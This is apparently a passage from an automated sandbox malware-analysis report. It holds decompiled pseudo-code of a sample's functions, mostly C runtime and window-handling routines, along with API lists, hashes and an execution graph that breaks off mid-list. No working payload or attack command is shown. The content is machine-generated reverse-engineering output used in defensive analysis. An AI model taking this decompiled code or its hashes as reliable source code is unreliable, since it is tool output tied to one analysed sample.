                                                                                  • API ID: MessageSend$swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3793038206-0
                                                                                  • Opcode ID: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
                                                                                  • Instruction ID: 66af78921c5875677350cfaec2ba26a2b368e15f8c7f004a64a750f81ebf7e58
                                                                                  • Opcode Fuzzy Hash: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
                                                                                  • Instruction Fuzzy Hash: 1F119E76A40309FFDB11DB94EC85FEA7BBCE748700F108177E650A61A1E3B12E458B68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E004089C0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				signed int _t12;
                                                                                  				void* _t28;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  
                                                                                  				_t31 = __eflags;
                                                                                  				_t26 = __edi;
                                                                                  				_t25 = __edx;
                                                                                  				_t20 = __ebx;
                                                                                  				_push(0xc);
                                                                                  				_push(0x4121e8);
                                                                                  				E00405990(__ebx, __edi, __esi);
                                                                                  				_t28 = E004072A9(__ebx, __edx, _t31);
                                                                                  				_t12 =  *0x414aa8; // 0xfffffffe
                                                                                  				if(( *(_t28 + 0x70) & _t12) == 0) {
                                                                                  					L6:
                                                                                  					E0040A357(_t20, _t26, 0xc);
                                                                                  					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                  					_t29 = _t28 + 0x6c;
                                                                                  					 *((intOrPtr*)(_t30 - 0x1c)) = E00408973(_t29,  *0x414cf0);
                                                                                  					 *(_t30 - 4) = 0xfffffffe;
                                                                                  					E00408A2D();
                                                                                  				} else {
                                                                                  					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						_t29 =  *((intOrPtr*)(E004072A9(_t20, __edx, _t33) + 0x6c));
                                                                                  					}
                                                                                  				}
                                                                                  				_t34 = _t29;
                                                                                  				if(_t29 == 0) {
                                                                                  					_push(0x20);
                                                                                  					E004069B9(_t25, _t34);
                                                                                  				}
                                                                                  				return E004059D5(_t29);
                                                                                  			}








                                                                                  0x004089c0
                                                                                  0x004089c0
                                                                                  0x004089c0
                                                                                  0x004089c0
                                                                                  0x004089c0
                                                                                  0x004089c2
                                                                                  0x004089c7
                                                                                  0x004089d1
                                                                                  0x004089d3
                                                                                  0x004089db
                                                                                  0x004089ff
                                                                                  0x00408a01
                                                                                  0x00408a07
                                                                                  0x00408a11
                                                                                  0x00408a1c
                                                                                  0x00408a1f
                                                                                  0x00408a26
                                                                                  0x004089dd
                                                                                  0x004089dd
                                                                                  0x004089e1
                                                                                  0x00000000
                                                                                  0x004089e3
                                                                                  0x004089e8
                                                                                  0x004089e8
                                                                                  0x004089e1
                                                                                  0x004089eb
                                                                                  0x004089ed
                                                                                  0x004089ef
                                                                                  0x004089f1
                                                                                  0x004089f6
                                                                                  0x004089fe

                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 004089CC
                                                                                    • Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
                                                                                    • Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9
                                                                                  • __getptd.LIBCMT ref: 004089E3
                                                                                  • __amsg_exit.LIBCMT ref: 004089F1
                                                                                  • __lock.LIBCMT ref: 00408A01
                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00408A15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                  • String ID:
                                                                                  • API String ID: 938513278-0
                                                                                  • Opcode ID: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
                                                                                  • Instruction ID: 976e5cdb44841edbfc45673e9f197270e52d64d1e78c74b2d10079b09f234e8e
                                                                                  • Opcode Fuzzy Hash: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
                                                                                  • Instruction Fuzzy Hash: C3F062B2904601ABD625BBAA5906B6E32909F00724F15416FF494B62D3CF7C59409A5F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004057DE() {
                                                                                  				intOrPtr _t5;
                                                                                  				intOrPtr _t6;
                                                                                  				intOrPtr _t10;
                                                                                  				void* _t12;
                                                                                  				intOrPtr _t15;
                                                                                  				intOrPtr* _t16;
                                                                                  				signed int _t19;
                                                                                  				signed int _t20;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t27;
                                                                                  
                                                                                  				_t5 =  *0x4182a0;
                                                                                  				_t26 = 0x14;
                                                                                  				if(_t5 != 0) {
                                                                                  					if(_t5 < _t26) {
                                                                                  						_t5 = _t26;
                                                                                  						goto L4;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t5 = 0x200;
                                                                                  					L4:
                                                                                  					 *0x4182a0 = _t5;
                                                                                  				}
                                                                                  				_t6 = E00408C3F(_t5, 4);
                                                                                  				 *0x417284 = _t6;
                                                                                  				if(_t6 != 0) {
                                                                                  					L8:
                                                                                  					_t19 = 0;
                                                                                  					_t15 = 0x4142b0;
                                                                                  					while(1) {
                                                                                  						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                                                  						_t15 = _t15 + 0x20;
                                                                                  						_t19 = _t19 + 4;
                                                                                  						if(_t15 >= 0x414530) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_t6 =  *0x417284;
                                                                                  					}
                                                                                  					_t27 = 0xfffffffe;
                                                                                  					_t20 = 0;
                                                                                  					_t16 = 0x4142c0;
                                                                                  					do {
                                                                                  						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x417180 + (_t20 >> 5) * 4))));
                                                                                  						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                                                  							 *_t16 = _t27;
                                                                                  						}
                                                                                  						_t16 = _t16 + 0x20;
                                                                                  						_t20 = _t20 + 1;
                                                                                  					} while (_t16 < 0x414320);
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					 *0x4182a0 = _t26;
                                                                                  					_t6 = E00408C3F(_t26, 4);
                                                                                  					 *0x417284 = _t6;
                                                                                  					if(_t6 != 0) {
                                                                                  						goto L8;
                                                                                  					} else {
                                                                                  						_t12 = 0x1a;
                                                                                  						return _t12;
                                                                                  					}
                                                                                  				}
                                                                                  			}













                                                                                  0x004057de
                                                                                  0x004057e6
                                                                                  0x004057e9
                                                                                  0x004057f4
                                                                                  0x004057f6
                                                                                  0x00000000
                                                                                  0x004057f6
                                                                                  0x004057eb
                                                                                  0x004057eb
                                                                                  0x004057f8
                                                                                  0x004057f8
                                                                                  0x004057f8
                                                                                  0x00405800
                                                                                  0x00405807
                                                                                  0x0040580e
                                                                                  0x0040582e
                                                                                  0x0040582e
                                                                                  0x00405830
                                                                                  0x0040583c
                                                                                  0x0040583c
                                                                                  0x0040583f
                                                                                  0x00405842
                                                                                  0x0040584b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405837
                                                                                  0x00405837
                                                                                  0x0040584f
                                                                                  0x00405850
                                                                                  0x00405852
                                                                                  0x00405858
                                                                                  0x0040586c
                                                                                  0x00405872
                                                                                  0x0040587c
                                                                                  0x0040587c
                                                                                  0x0040587e
                                                                                  0x00405881
                                                                                  0x00405882
                                                                                  0x0040588e
                                                                                  0x00405810
                                                                                  0x00405813
                                                                                  0x00405819
                                                                                  0x00405820
                                                                                  0x00405827
                                                                                  0x00000000
                                                                                  0x00405829
                                                                                  0x0040582b
                                                                                  0x0040582d
                                                                                  0x0040582d
                                                                                  0x00405827

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: __calloc_crt
                                                                                  • String ID: CA$0EA
                                                                                  • API String ID: 3494438863-962656358
                                                                                  • Opcode ID: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
                                                                                  • Instruction ID: 86693eefe5dd9b7c921068e51d74e635daad96af07061ee7db7e118806e0be7c
                                                                                  • Opcode Fuzzy Hash: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
                                                                                  • Instruction Fuzzy Hash: 7111E772704A155BE7249F1EBD406A73395EB84364B24817FF914E73D0EB3CC8825A4C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00408D7B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				char _v8;
                                                                                  				signed int _v12;
                                                                                  				char _v20;
                                                                                  				char _t43;
                                                                                  				char _t46;
                                                                                  				signed int _t53;
                                                                                  				signed int _t54;
                                                                                  				intOrPtr _t56;
                                                                                  				int _t57;
                                                                                  				int _t58;
                                                                                  				char _t59;
                                                                                  				short* _t60;
                                                                                  				int _t65;
                                                                                  				char* _t73;
                                                                                  
                                                                                  				_t73 = _a8;
                                                                                  				if(_t73 == 0 || _a12 == 0) {
                                                                                  					L5:
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					if( *_t73 != 0) {
                                                                                  						E00403753( &_v20, __edi, _a16);
                                                                                  						_t43 = _v20;
                                                                                  						__eflags =  *(_t43 + 0x14);
                                                                                  						if( *(_t43 + 0x14) != 0) {
                                                                                  							_t46 = E00408EAB( *_t73 & 0x000000ff,  &_v20);
                                                                                  							__eflags = _t46;
                                                                                  							if(_t46 == 0) {
                                                                                  								__eflags = _a4;
                                                                                  								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                  								if(__eflags != 0) {
                                                                                  									L10:
                                                                                  									__eflags = _v8;
                                                                                  									if(_v8 != 0) {
                                                                                  										_t53 = _v12;
                                                                                  										_t11 = _t53 + 0x70;
                                                                                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                  										__eflags =  *_t11;
                                                                                  									}
                                                                                  									return 1;
                                                                                  								}
                                                                                  								L21:
                                                                                  								_t54 = E0040370A(__eflags);
                                                                                  								 *_t54 = 0x2a;
                                                                                  								__eflags = _v8;
                                                                                  								if(_v8 != 0) {
                                                                                  									_t54 = _v12;
                                                                                  									_t33 = _t54 + 0x70;
                                                                                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                  									__eflags =  *_t33;
                                                                                  								}
                                                                                  								return _t54 | 0xffffffff;
                                                                                  							}
                                                                                  							_t56 = _v20;
                                                                                  							_t65 =  *(_t56 + 0xac);
                                                                                  							__eflags = _t65 - 1;
                                                                                  							if(_t65 <= 1) {
                                                                                  								L17:
                                                                                  								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                  								if(__eflags < 0) {
                                                                                  									goto L21;
                                                                                  								}
                                                                                  								__eflags = _t73[1];
                                                                                  								if(__eflags == 0) {
                                                                                  									goto L21;
                                                                                  								}
                                                                                  								L19:
                                                                                  								_t57 =  *(_t56 + 0xac);
                                                                                  								__eflags = _v8;
                                                                                  								if(_v8 == 0) {
                                                                                  									return _t57;
                                                                                  								}
                                                                                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                  								return _t57;
                                                                                  							}
                                                                                  							__eflags = _a12 - _t65;
                                                                                  							if(_a12 < _t65) {
                                                                                  								goto L17;
                                                                                  							}
                                                                                  							__eflags = _a4;
                                                                                  							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                  							__eflags = _t58;
                                                                                  							_t56 = _v20;
                                                                                  							if(_t58 != 0) {
                                                                                  								goto L19;
                                                                                  							}
                                                                                  							goto L17;
                                                                                  						}
                                                                                  						_t59 = _a4;
                                                                                  						__eflags = _t59;
                                                                                  						if(_t59 != 0) {
                                                                                  							 *_t59 =  *_t73 & 0x000000ff;
                                                                                  						}
                                                                                  						goto L10;
                                                                                  					} else {
                                                                                  						_t60 = _a4;
                                                                                  						if(_t60 != 0) {
                                                                                  							 *_t60 = 0;
                                                                                  						}
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				}
                                                                                  			}

















                                                                                  0x00408d85
                                                                                  0x00408d8c
                                                                                  0x00408da3
                                                                                  0x00000000
                                                                                  0x00408d93
                                                                                  0x00408d95
                                                                                  0x00408daf
                                                                                  0x00408db4
                                                                                  0x00408db7
                                                                                  0x00408dba
                                                                                  0x00408de2
                                                                                  0x00408de9
                                                                                  0x00408deb
                                                                                  0x00408e6c
                                                                                  0x00408e87
                                                                                  0x00408e89
                                                                                  0x00408dc9
                                                                                  0x00408dc9
                                                                                  0x00408dcc
                                                                                  0x00408dce
                                                                                  0x00408dd1
                                                                                  0x00408dd1
                                                                                  0x00408dd1
                                                                                  0x00408dd1
                                                                                  0x00000000
                                                                                  0x00408dd7
                                                                                  0x00408e4b
                                                                                  0x00408e4b
                                                                                  0x00408e50
                                                                                  0x00408e56
                                                                                  0x00408e59
                                                                                  0x00408e5b
                                                                                  0x00408e5e
                                                                                  0x00408e5e
                                                                                  0x00408e5e
                                                                                  0x00408e5e
                                                                                  0x00000000
                                                                                  0x00408e62
                                                                                  0x00408ded
                                                                                  0x00408df0
                                                                                  0x00408df6
                                                                                  0x00408df9
                                                                                  0x00408e20
                                                                                  0x00408e23
                                                                                  0x00408e29
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00408e2b
                                                                                  0x00408e2e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00408e30
                                                                                  0x00408e30
                                                                                  0x00408e36
                                                                                  0x00408e39
                                                                                  0x00408da8
                                                                                  0x00408da8
                                                                                  0x00408e42
                                                                                  0x00000000
                                                                                  0x00408e42
                                                                                  0x00408dfb
                                                                                  0x00408dfe
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00408e02
                                                                                  0x00408e13
                                                                                  0x00408e19
                                                                                  0x00408e1b
                                                                                  0x00408e1e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00408e1e
                                                                                  0x00408dbc
                                                                                  0x00408dbf
                                                                                  0x00408dc1
                                                                                  0x00408dc6
                                                                                  0x00408dc6
                                                                                  0x00000000
                                                                                  0x00408d97
                                                                                  0x00408d97
                                                                                  0x00408d9c
                                                                                  0x00408da0
                                                                                  0x00408da0
                                                                                  0x00000000
                                                                                  0x00408d9c
                                                                                  0x00408d95

                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408DAF
                                                                                  • __isleadbyte_l.LIBCMT ref: 00408DE2
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,?,00000000,00000000,?,?,?,?,004029D6), ref: 00408E13
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,00000001,00000000,00000000,?,?,?,?,004029D6), ref: 00408E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
                                                                                  • Instruction ID: 0c9ba43707c01210f15d82bc915928d229edbab3a984a60048fa1d6b0ab5e1b1
                                                                                  • Opcode Fuzzy Hash: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
                                                                                  • Instruction Fuzzy Hash: BF31B131A00245EFDB20DFA4CD849AA3BB5EF41310F24867EE4A5AB2D1DB38DD41DB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404E68(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                  				intOrPtr _t25;
                                                                                  				void* _t26;
                                                                                  
                                                                                  				_t25 = _a16;
                                                                                  				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                  					_t26 = E0040475A(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                  					goto L9;
                                                                                  				} else {
                                                                                  					_t35 = _t25 - 0x66;
                                                                                  					if(_t25 != 0x66) {
                                                                                  						__eflags = _t25 - 0x61;
                                                                                  						if(_t25 == 0x61) {
                                                                                  							L7:
                                                                                  							_t26 = E00404841(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                  						} else {
                                                                                  							__eflags = _t25 - 0x41;
                                                                                  							if(__eflags == 0) {
                                                                                  								goto L7;
                                                                                  							} else {
                                                                                  								_t26 = E00404D7B(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                  							}
                                                                                  						}
                                                                                  						L9:
                                                                                  						return _t26;
                                                                                  					} else {
                                                                                  						return E00404CBA(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                  					}
                                                                                  				}
                                                                                  			}





                                                                                  0x00404e6d
                                                                                  0x00404e73
                                                                                  0x00404ee6
                                                                                  0x00000000
                                                                                  0x00404e7a
                                                                                  0x00404e7a
                                                                                  0x00404e7d
                                                                                  0x00404e98
                                                                                  0x00404e9b
                                                                                  0x00404ebb
                                                                                  0x00404ecd
                                                                                  0x00404e9d
                                                                                  0x00404e9d
                                                                                  0x00404ea0
                                                                                  0x00000000
                                                                                  0x00404ea2
                                                                                  0x00404eb4
                                                                                  0x00404eb4
                                                                                  0x00404ea0
                                                                                  0x00404eeb
                                                                                  0x00404eef
                                                                                  0x00404e7f
                                                                                  0x00404e97
                                                                                  0x00404e97
                                                                                  0x00404e7d

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                  • Instruction ID: 908501024bb7c2d4d9aded8cda733e96d04f0b6ba79867bc6ebe503863c54618
                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                  • Instruction Fuzzy Hash: 1F11877200014ABBCF165E85CC05CEE3F63BB99354B158926FF1865170D33AD971AB85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00401F1C(intOrPtr _a4) {
                                                                                  				short _v516;
                                                                                  				short _v1028;
                                                                                  
                                                                                  				LoadStringW( *0x415f60, 0x179,  &_v516, 3);
                                                                                  				wsprintfW( &_v1028,  &_v516, _a4);
                                                                                  				LoadStringW( *0x415f60, 0x171,  &_v516, 6);
                                                                                  				return MessageBoxW( *0x415f64,  &_v1028,  &_v516, 0x33);
                                                                                  			}





                                                                                  0x00401f40
                                                                                  0x00401f53
                                                                                  0x00401f70
                                                                                  0x00401f90

                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000179,?,00000003), ref: 00401F40
                                                                                  • wsprintfW.USER32 ref: 00401F53
                                                                                  • LoadStringW.USER32(00000171,?,00000006), ref: 00401F70
                                                                                  • MessageBoxW.USER32(?,?,00000033), ref: 00401F88
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString$Messagewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3675432989-0
                                                                                  • Opcode ID: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
                                                                                  • Instruction ID: f1b68f74e27ae39634cdf6190571022c2f1221254ce974dc298a2efd5b2adec8
                                                                                  • Opcode Fuzzy Hash: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
                                                                                  • Instruction Fuzzy Hash: 08F01D7690021CBBEB119B50DC89FEA7B7DFB08304F0840B6BB08A60A1D6B15A55CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00402130() {
                                                                                  				struct tagRECT _v20;
                                                                                  				signed int _t7;
                                                                                  				signed int _t14;
                                                                                  				signed int _t20;
                                                                                  
                                                                                  				_t20 =  *0x415f78; // 0x0
                                                                                  				_t7 = 0 | _t20 == 0x00000000;
                                                                                  				 *0x415f78 = _t7;
                                                                                  				asm("sbb eax, eax");
                                                                                  				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t7 & 0x00000008);
                                                                                  				GetClientRect( *0x415f64,  &_v20);
                                                                                  				_t14 =  *0x415f78; // 0x0
                                                                                  				asm("sbb eax, eax");
                                                                                  				ShowWindow( *0x415f74,  ~_t14 & 0x00000005);
                                                                                  				E00401170(_v20.right, _v20.bottom);
                                                                                  				return E004010B6();
                                                                                  			}







                                                                                  0x00402138
                                                                                  0x0040213e
                                                                                  0x00402141
                                                                                  0x00402148
                                                                                  0x00402160
                                                                                  0x00402170
                                                                                  0x00402176
                                                                                  0x0040217d
                                                                                  0x00402189
                                                                                  0x00402195
                                                                                  0x004021a0

                                                                                  APIs
                                                                                  • GetMenu.USER32(00000205), ref: 00402159
                                                                                  • CheckMenuItem.USER32(00000000), ref: 00402160
                                                                                  • GetClientRect.USER32 ref: 00402170
                                                                                  • ShowWindow.USER32(00000000), ref: 00402189
                                                                                    • Part of subcall function 00401170: SendMessageW.USER32(00000005,00000000,00000000), ref: 0040118D
                                                                                    • Part of subcall function 00401170: GetWindowRect.USER32 ref: 0040119D
                                                                                    • Part of subcall function 00401170: SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000204), ref: 004011C0
                                                                                    • Part of subcall function 004010B6: SendMessageW.USER32(000000B0,?,?), ref: 004010DB
                                                                                    • Part of subcall function 004010B6: SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
                                                                                    • Part of subcall function 004010B6: SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
                                                                                    • Part of subcall function 004010B6: swprintf.LIBCMT ref: 00401144
                                                                                    • Part of subcall function 004010B6: SendMessageW.USER32(00000029,00000000,?), ref: 0040115D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$MenuRect$CheckClientItemShowswprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2422921040-0
                                                                                  • Opcode ID: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
                                                                                  • Instruction ID: 2110b4cd67f0e5a39b5caf6ff6ab68c74d55df39b8f184eadb547ce7c05df833
                                                                                  • Opcode Fuzzy Hash: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
                                                                                  • Instruction Fuzzy Hash: 0FF0123159060AFFDB01BFB4ED4ECE93BB9E748305B048531F501D60B0EA7A85969B18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:11.9%
                                                                                  Dynamic/Decrypted Code Coverage:73.1%
                                                                                  Signature Coverage:1.5%
                                                                                  Total number of Nodes:479
                                                                                  Total number of Limit Nodes:35
                                                                                  execution_graph 27453 404a83 27466 407507 GetEnvironmentStringsW 27453->27466 27455 404a94 27456 404aa6 27455->27456 27457 404a9a 27455->27457 27474 404ad7 41 API calls 3 library calls 27456->27474 27473 40650b 14 API calls 2 library calls 27457->27473 27460 404aa0 27461 404aad 27475 40650b 14 API calls 2 library calls 27461->27475 27463 404aca 27476 40650b 14 API calls 2 library calls 27463->27476 27465 404ad0 27467 407516 27466->27467 27468 407518 27466->27468 27467->27455 27477 407d48 27468->27477 27470 40752d __InternalCxxFrameHandler 27484 40650b 14 API calls 2 library calls 27470->27484 27472 407547 FreeEnvironmentStringsW 27472->27455 27473->27460 27474->27461 27475->27463 27476->27465 27478 407d86 27477->27478 27483 407d56 _unexpected 27477->27483 27486 40649b 14 API calls _com_raise_error 27478->27486 27480 407d71 RtlAllocateHeap 27481 407d84 27480->27481 27480->27483 27481->27470 27483->27478 27483->27480 27485 4087b5 RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 27483->27485 27484->27472 27485->27483 27486->27481 27487 5074180 27489 50741a7 27487->27489 27488 5074284 27488->27488 27489->27488 27491 5073474 27489->27491 27492 5074600 CreateActCtxA 27491->27492 27494 50746c3 27492->27494 27495 507c600 27496 507c62c 27495->27496 27497 507c63c 27496->27497 27499 507c668 27496->27499 27501 507c649 27496->27501 27502 5072750 27497->27502 27500 5072750 5 API calls 27499->27500 27500->27501 27503 5072760 27502->27503 27504 507279d 27503->27504 27506 5075d48 27503->27506 27504->27501 27507 5075d81 27506->27507 27514 5075e1f 27507->27514 27527 22ce0d8 27507->27527 27532 22ce0f0 27507->27532 27511 5075e95 27555 5075604 27511->27555 27537 50755f4 27514->27537 27515 5075ec4 27517 5072750 5 API calls 27515->27517 27518 5075fb4 27515->27518 27520 5075f4c 27517->27520 27576 507cd58 27518->27576 27520->27518 27566 5075674 27520->27566 27522 5075fa6 27573 5071540 27522->27573 27529 22ce0f0 27527->27529 27528 22ce12d 27528->27514 27529->27528 27580 22ce428 27529->27580 27583 22ce438 27529->27583 27533 22ce121 27532->27533 27534 22ce12d 27532->27534 27533->27534 27535 22ce428 2 API calls 27533->27535 27536 22ce438 2 API calls 27533->27536 27534->27514 27535->27534 27536->27534 27539 50755ff 27537->27539 27538 5075e8b 27541 5075120 27538->27541 27539->27538 27540 5072750 5 API calls 27539->27540 27540->27538 27542 507512b 27541->27542 27543 5079f11 27542->27543 27544 5079f64 27542->27544 27554 5079f98 27542->27554 27612 5079704 LoadLibraryExW GetModuleHandleW SendMessageW SendMessageW CreateIconFromResourceEx 27542->27612 27545 5079f4a 27543->27545 27547 5075674 5 API calls 27543->27547 27553 5072750 5 API calls 27544->27553 27544->27554 27546 5075674 5 API calls 